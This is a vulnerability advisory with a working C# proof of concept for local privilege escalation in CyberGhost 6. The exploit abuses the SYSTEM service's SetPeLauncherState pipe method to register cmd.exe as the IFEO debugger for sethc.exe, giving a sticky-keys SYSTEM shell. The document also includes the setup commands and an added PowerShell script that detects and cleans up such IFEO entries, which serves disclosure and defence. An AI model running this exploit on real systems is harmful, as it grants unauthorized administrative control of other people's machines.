CyberGhost Privilege Escalation



The CG6Service Windows service runs as LocalSystem (SYSTEM), which you can confirm with:

wmic service where name="CG6Service" get StartName

Any local process, including an unprivileged one, can talk to this service over a named pipe.

The service exposes an interesting method, SetPeLauncherState, which registers a "debugger" for any executable we name by writing under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options (see MSDN). Windows then launches that debugger, with the original image as its argument, every time the named executable starts.

Because the registry write is performed by the SYSTEM service rather than by our process, we can use this method for privilege escalation: set cmd.exe as the debugger for sethc.exe, the well-known sticky keys technique.

using System;
using CyberGhost.Communication;

namespace cyber
{
    class Program
    {
        static void Main(string[] args)
        {
            Console.WriteLine("CyberGhost Privilege Escalation");
            Console.WriteLine("by Kacper Szurek");

            // IFEO entry to create: run cmd.exe as the "debugger" of sethc.exe.
            PeLauncherOptions options = new PeLauncherOptions();
            options.ExecuteableName = "sethc.exe";
            options.PeLauncherExecuteable = @"c:\Windows\System32\cmd.exe";

            // Connect to CG6Service over its named pipe (pipe name as used by the service).
            EventSender CyberGhostCom = new EventSender("CyherGhostPipe");

            // The service, running as SYSTEM, writes the IFEO key on our behalf.
            CyberGhostCom.SetPeLauncherState(options, PeLauncherOperation.Add);

            Console.WriteLine("Now logout and then press SHIFT key 5 times");
        }
    }
}

Proof of Concept:

Download Exploit

The exploit needs the following CyberGhost assemblies copied next to it before it can be launched:

copy "c:\Program Files\CyberGhost 6\CyberGhost.Communication.dll" .
copy "c:\Program Files\CyberGhost 6\CyberGhost.VPNServices.dll" .
copy "c:\Program Files\CyberGhost 6\MobileConcepts45.dll" .

After the exploit runs successfully, log out and press the Shift key five times on the logon screen.

Windows then starts the registered "debugger" of sethc.exe instead of sethc.exe itself, so cmd.exe is executed as SYSTEM on the logon desktop.
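The exploit above leaves a persistent Image File Execution Options entry behind, and the same mechanism is what a defender should look for. The following PowerShell is an added example, not part of the original advisory or of CyberGhost's code: it enumerates every IFEO subkey that carries a Debugger value, flags the ones for accessibility binaries reachable from the logon screen (that list is an assumption of the usual sticky-keys-style targets, the advisory only names sethc.exe), and provides a cleanup function for the sethc.exe entry created by the PoC. Run it from an elevated prompt.

```powershell
# Added example (not from the original advisory): audit the IFEO tree that
# SetPeLauncherState writes to, and remove the entry the PoC leaves behind.
# Requires an elevated PowerShell session.

$ifeo = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options'

# Accessibility helpers that can be launched from the logon screen.
# Assumed list of common sticky-keys-style targets; the advisory itself
# only uses sethc.exe.
$logonHelpers = @('sethc.exe', 'utilman.exe', 'osk.exe', 'narrator.exe',
                  'magnify.exe', 'displayswitch.exe', 'atbroker.exe')

function Get-IfeoDebugger {
    # One object per IFEO subkey that has a Debugger value set.
    Get-ChildItem -Path $ifeo -ErrorAction Stop | ForEach-Object {
        $debugger = (Get-ItemProperty -Path $_.PSPath -Name Debugger -ErrorAction SilentlyContinue).Debugger
        if ($debugger) {
            [pscustomobject]@{
                Image      = $_.PSChildName
                Debugger   = $debugger
                LogonReach = ($logonHelpers -contains $_.PSChildName)
            }
        }
    }
}

function Remove-IfeoDebugger {
    param([Parameter(Mandatory)][string]$Image)
    # Delete only the Debugger value so other IFEO settings (e.g. GlobalFlag)
    # on the same image survive; drop the subkey only if it is now empty.
    $key = Join-Path $ifeo $Image
    if (-not (Test-Path $key)) { return }
    Remove-ItemProperty -Path $key -Name Debugger -ErrorAction SilentlyContinue
    $item = Get-Item -Path $key
    if ($item.ValueCount -eq 0 -and $item.SubKeyCount -eq 0) {
        Remove-Item -Path $key
    }
}

$hits = @(Get-IfeoDebugger)
if ($hits.Count -gt 0) {
    $hits | Format-Table -AutoSize
    $hits | Where-Object LogonReach | ForEach-Object {
        Write-Warning "Debugger set on logon-reachable binary $($_.Image): $($_.Debugger)"
    }
} else {
    Write-Host 'No IFEO Debugger values found.'
}

# Cleanup after testing the PoC:
# Remove-IfeoDebugger -Image 'sethc.exe'
```

Any Debugger value on a logon-reachable binary deserves investigation regardless of which product wrote it; legitimate uses of IFEO Debugger are rare outside development machines, so the hit list is usually short enough to review by hand.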